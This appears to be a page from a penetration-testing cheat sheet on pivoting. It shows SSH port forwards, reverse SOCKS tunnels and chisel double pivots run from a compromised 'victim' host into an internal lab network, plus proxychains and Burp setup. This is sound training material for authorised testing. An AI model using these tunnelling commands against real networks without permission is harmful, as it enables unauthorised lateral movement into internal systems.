# Pivoting ## Network setup The following sections rely on this network setup. ``` ┌──────────────┐ ┌──────────────┐ ┌──────────────┐ │ attacking │ │ compromised │ │ target │ │ machine │ │ machine │ │ machine │ │ (local) │ │ (pivot) │ │ (target) │ │ │ │ │ │ │ │ 10.10.10.2 ◄┼──public──┼► 10.10.10.5 │ │ │ │ │ │ │ │ │ │ │ │ 172.16.0.5 ◄┼──internal──┼► 172.16.0.10 │ │ │ │ │ │ │ └──────────────┘ └──────────────┘ └──────────────┘ ``` | Machine name | Short name | User | | ------------------- | ---------- | ------ | | Attacking Machine | local | me | | Compromised Machine | pivot | victim | | Target Machine | target | - | ## SSH ### Common options | option | description | | ------ | --------------------------------------------------------- | | `-L` | Forward connection (**L**ocal port forwarding) | | `-R` | Reverse connection (**R**emote port forwarding) | | `-D` | Socks proxy (**D**ynamic port forwarding) | | `-f` | Immediately background the shell | | `-N` | Only establish the connection, don't execute any commands | ### Forward connection (Local port forwarding) ``` local pivot target 10.10.10.2 10.10.10.5 172.16.0.10 172.16.0.5 │ │ │ │ │ │ │ssh -L 1337:172.16.0.10:80 │ │ ├──────────────────────────────►│ │ │ │ │ │nc 127.0.0.1 1337 │ │ ├──────────────────────────────►│ 80 │ │ ├──────────────────►│ │ │ │ ``` Setup a local port forward to the target. ```bash ssh -L 1337:172.16.0.10:80 victim@10.10.10.5 ``` Execute command ```bash # Example nc 127.0.0.1 1337 ``` ### Reverse connection (Remote port forwarding) ``` local pivot target 10.10.10.2 10.10.10.5 172.16.0.10 172.16.0.5 │ │ │ │ │ │ │ ssh -R 1337:172.16.0.10:80│ │ │◄──────────────────────────────┤ │ │ │ │ │nc 127.0.0.1 1337 │ │ ├──────────────────────────────►│ 80 │ │ ├──────────────────►│ │ │ │ ``` As we will connect back from the target (network) to our own machine, we need to take some precautions to ensure our safety. 1. Generate a new ssh key pair ```bash ssh-keygen ``` 1. Add public key to `authorized_keys` with following restrictions ```bash from="",command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-X11-forwarding,no-pty ``` 1. Check ssh server status ```bash sudo systemctl status ssh ``` 1. Start ssh server (if not already running) ```bash sudo systemctl start ssh ``` 1. Copy the private key over to the pivot\ ⚠️ Normally we would never give away our private key, but that's why we're using a new throwaway key pair here! ⚠️ Setup a remote port forward from the pivot. ```bash ssh -R 1337:172.16.0.10:80 me@10.10.10.2 -i throwaway-key ``` Execute command (example) ```bash nc 127.0.0.1 1337 ``` ### Socks proxy (Dynamic port forwarding) ``` local pivot target 10.10.10.2 10.10.10.5 172.16.0.10 172.16.0.5 │ │ │ │ │ │ │ssh -D 1337 [...] │ │ ├────────────────────────────────►│ │ │ │ │ │proxychains nc 172.16.0.10 any │ │ ├────────────────────────────────►│ any │ │ ├──────────────────►│ │ │ │ ``` Setup a proxy that forwards any tcp port to any target. ```bash ssh -D 1337 victim@10.10.10.5 ``` proxychains.conf (see also below) ```bash socks5 127.0.0.1 1337 ``` Execute command (example) ```bash proxychains nc 172.16.0.10 80 ``` ### Socks proxy (reverse) ``` local pivot target 10.10.10.2 10.10.10.5 172.16.0.10 172.16.0.5 │ │ │ │ │ │ │ ssh -R 1337 [...]│ │ │◄────────────────────────────────┤ │ │ │ │ │proxychains nc 172.16.0.10 any │ │ ├────────────────────────────────►│ any │ │ ├──────────────────►│ │ │ │ ``` ```bash ssh -R 1337 me@10.10.10.2 -i throwaway-key ``` ## Chisel > A fast TCP/UDP tunnel over HTTP\ > [GitHub - jpillora/chisel](https://github.com/jpillora/chisel) ### Port forwarding ``` ┌────────┐ ┌────────┐ ┌────────┐ │ local │ │ pivot │ │ target │ │ │ │ │ │ │ │ 9000 ◄┼──chisel───────────┼► 9000 │ │ │ │ │ │ │ │ │ │ 9001 ─┼──port-forwarding──┼────────┼───┼► 80 │ │ │ │ │ │ │ └────────┘ └────────┘ └────────┘ ``` ``` local pivot target 10.10.10.2 10.10.10.5 172.16.0.10 172.16.0.5 │ │ │ │ │ │ │./chisel server -p 9000 -reverse │ │ ├──┐ │ │ │ │ │ │ │◄─┘ │ │ │ │ │ │ ./chisel client 10.10.10.2:9000 [...]│ │ │◄───────────────────────────────────────────┤ │ │ │ │ │nc 172.16.0.10 9001 │ │ ├───────────────────────────────────────────►│ 80 │ │ ├──────────────────►│ │ │ │ ``` Start server (local) ```bash ./chisel server -p 9000 -reverse ``` Start client (pivot) ```bash ./chisel client 10.10.10.2:9000 R:127.0.0.1:9001:172.16.0.10:80 ``` Execute command (example) ```bash nc 172.16.0.10 9001 ``` ### SOCKS proxy ``` ┌────────┐ ┌────────┐ ┌────────┐ │ local │ │ pivot │ │ target │ │ │ │ │ │ │ │ 9000 ◄┼──chisel───────────┼► 9000 │ │ │ │ │ │ │ │ │ │ 1080 ─┼──SOCKS─proxy──────┼────────┼───┼► any │ │ │ │ │ │ │ └────────┘ └────────┘ └────────┘ ``` ``` local pivot target 10.10.10.2 10.10.10.5 172.16.0.10 172.16.0.5 │ │ │ │ │ │ │./chisel server -p 9000 -reverse │ │ ├──┐ │ │ │ │ │ │ │◄─┘ │ │ │ │ │ │ ./chisel client 10.10.10.2:9000 R:socks│ │ │◄───────────────────────────────────────────┤ │ │ │ │ │proxychains nc 172.16.0.10 any │ │ ├───────────────────────────────────────────►│ any │ │ ├──────────────────►│ │ │ │ ``` Start server (local) ```bash ./chisel server -p 9000 -reverse ``` Start client (pivot) ```bash ./chisel client 10.10.10.2:9000 R:socks ``` Note: `` defaults to 1080, if left out. Execute command (example) ```bash proxychains nc 172.16.0.10 80 ``` ### Double pivot (via SOCKS proxies) ``` ┌─subnet1───────────────────────────┐┌─subnet2───────────────────┐┌─subnet3───────────────┐ │ ││ ││ │ │ ┌─local──┐ ┌─pivot1─┐ ┌─pivot2─┐ ┌─target─┐ │ │ │ │ │ │ │ │ │ │ │ │ │ 9000 ◄├──chisel───────────┤► 9000 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 9001 ◄├──chisel───────────┤► 9001 │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 1080 ─┼──SOCKS─proxy──────┼────────┼─► any │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ 1081 ─┼───────────────────┼────────┼──SOCKS─proxy──────┼────────┼─► any │ │ │ │ │ │ │ │ │ │ │ │ │ │ └────────┘ └────────┘ └────────┘ └────────┘ │ │ ││ ││ │ └───────────────────────────────────┘└───────────────────────────┘└───────────────────────┘ ``` ``` ┌─subnet1───────────────────────────────────────┐┌─subnet2───────────────────────────────────┐┌─subnet3───────────────┐ local pivot pivot2 target 10.10.10.2 10.10.10.5 172.16.0.10 172.16.1.20 172.16.0.5 172.16.1.10 │ │ │ │ │ │ │ │ │./chisel server -p 9000 -reverse │ │ │ ├──┐ │ │ │ │ │ │ │ │ │◄─┘ │ │ │ │ │ │ │ │ ./chisel client 10.10.10.2:9000 R:socks│ │ │ │◄───────────────────────────────────────────┤ │ │ │ │ │ │ │ │./chisel server -p 9001 -reverse │ │ │ ├──┐ │ │ │ │ │ │ │ │ │◄─┘ │ │ │ │ │ │ │ │ ./chisel client 172.16.0.5:9001 R:socks│ │ │ │◄───────────────────────────────────────────┤ │ │ │ │ │ │ │ │ │ │ │ │ │ │proxychains nc any │ │ │ ├───────────────────────────────────────────►│ any │ │ │ ├───────────────────────────────────────────►│ any │ │ │ ├──────────────────►│ │ │ │ │ ``` Start server (local) ```bash ./chisel server -p 9000 -reverse ``` Start client (pivot1) ```bash ./chisel client 10.10.10.2:9000 R:socks ``` Start another server (pivot1) ```bash ./chisel server -p 9001 -reverse ``` Start another client (pivot2) ```bash ./chisel client 172.16.0.5:9001 R:socks ``` Add another proxy to `proxychains.conf` (more details on proxychains, see below) ```bash socks5 127.0.0.1 1080 socks5 127.0.0.1 1081 ``` Execute command (example) ```bash proxychains nc 172.16.1.20 80 ``` ## Verify ```bash netstat -tulpn ``` E.g. ``` [...] Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:1337 0.0.0.0:* LISTEN 50883/ssh tcp6 0 0 ::1:1337 :::* LISTEN 50883/ssh [...] ``` ## proxychains > A tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy.\ > [GitHub - haad/proxychains: proxychains](https://github.com/haad/proxychains) ### Config file Proxychains looks for configuration in the following order: 1. Env 2. `-f proxychains.conf` 3. `./proxychains.conf` 4. `~/.proxychains/proxychains.conf` 5. `/etc/proxychains.conf` ``` socks5 127.0.0.1 1080 ``` Run command via proxychains ```bash proxychains ``` ## Burp Suite To use Burp Suite in this setup, just configure the socks proxy there. `Project options` or `User options` → `SOCKS Proxy` → `☑️ Use SOCKS Proxy` * `SOCKS proxy host:` `127.0.0.1` * `SOCKS proxy port:` `1080` ⚠️ Keep your browser pointing to Burp Suites' proxy as usual! ⚠️ ## Foxy Proxy See [Firefox extensions](https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/misc/firefox-extensions)